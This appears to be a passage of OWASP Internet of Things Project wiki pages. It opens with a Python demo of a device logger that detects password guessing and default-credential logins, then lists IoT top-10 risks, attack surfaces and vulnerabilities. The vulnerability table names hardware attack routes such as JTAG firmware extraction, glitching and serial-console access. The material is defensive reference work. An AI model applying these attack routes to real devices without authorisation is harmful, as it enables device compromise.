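            self.log("Authentication Exceptions", "High Rate of Login Attempts", src=src_ip, attempts=len(recent))
        stored = self.users.get(user)
        ok = stored is not None and hmac.compare_digest(pw_hash(password, stored[0]), stored[1])
        if not ok:
            self.failures[user] += 1
            if self.failures[user] >= FAIL_THRESHOLD:
                self.log("Authentication Exceptions", "Multiple Failed Passwords", user=user,
                         count=self.failures[user], src=src_ip)
            return False
        self.failures[user] = 0
        d_user, d_salt, d_hash = self.factory_default
        if user == d_user and hmac.compare_digest(pw_hash(password, d_salt), d_hash):
            self.log("Administrative Mode Events", "Device Accessed Using Default Administrative Credentials",
                     user=user, src=src_ip)
        return True


def demo() -> list:
    """Constructed traffic against one device; returns the event records it logged."""
    now = [1_572_566_400.0]                                   # fixed clock, advanced by hand
    salt = b"constructed-salt"
    default = ("admin", salt, pw_hash("admin", salt))         # factory default admin/admin, never changed
    users = {"admin": default[1:], "operator": (salt, pw_hash("correct-horse-7", salt))}
    dev = DeviceEventLogger("cam-17", users, default, enrolled={"hub-01"},
                            disenrolled={"hub-old"}, clock=lambda: now[0])
    dev.handle_request("hub-01", "10.0.0.2", "GET", "/status")                # normal, nothing logged
    dev.handle_request("hub-old", "10.0.0.9", "GET", "/status")               # decommissioned hub
    dev.handle_request("laptop", "10.0.0.50", "DELETE", "/admin/backup.zip")  # unenrolled, odd method, decoy
    for guess in ("password1", "123456", "operator"):                        # three wrong passwords
        dev.login("10.0.0.50", "operator", guess)
        now[0] += 1
    for guess in ("letmein", "admin123"):                                     # attempts 4 and 5 inside 60 s
        dev.login("10.0.0.50", "admin", guess)
        now[0] += 1
    dev.login("10.0.0.2", "admin", "admin")                                   # success with the factory default
    return dev.events


if __name__ == "__main__":
    for record in demo():
        print(json.dumps(record))
```
<br />
The thresholds (three failures per user, five attempts per source per minute) are illustrative and would be tuned centrally for a fleet. The records are emitted as JSON so they can be shipped off the device; given the Device Access Events above, a log that lives only on a tamperable device is not a reliable record.<br />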
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build one have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write interoperable applications regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246181OWASP Internet of Things Project2018-12-19T23:37:32Z<p>Aaron.guzman: /* Main */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: CSA IoT Controls Matrix, CTIA, Stanford’s Secure Internet of Things Project, NISTIR 8200, ENISA IoT Baseline Report, Code of Practice for Consumer IoT Security, and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key (shared across devices)<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies that service, or the entire device, to legitimate users<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information: source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, the firmware's execution on the device can be altered at run time (for example by changing a register or skipping a check), bypassing almost all software-based security controls.<br />
* Side-channel attacks such as glitching can likewise alter the execution flow, or be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can often obtain full console access to the device<br />
* Common countermeasures include custom bootloaders that prevent entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
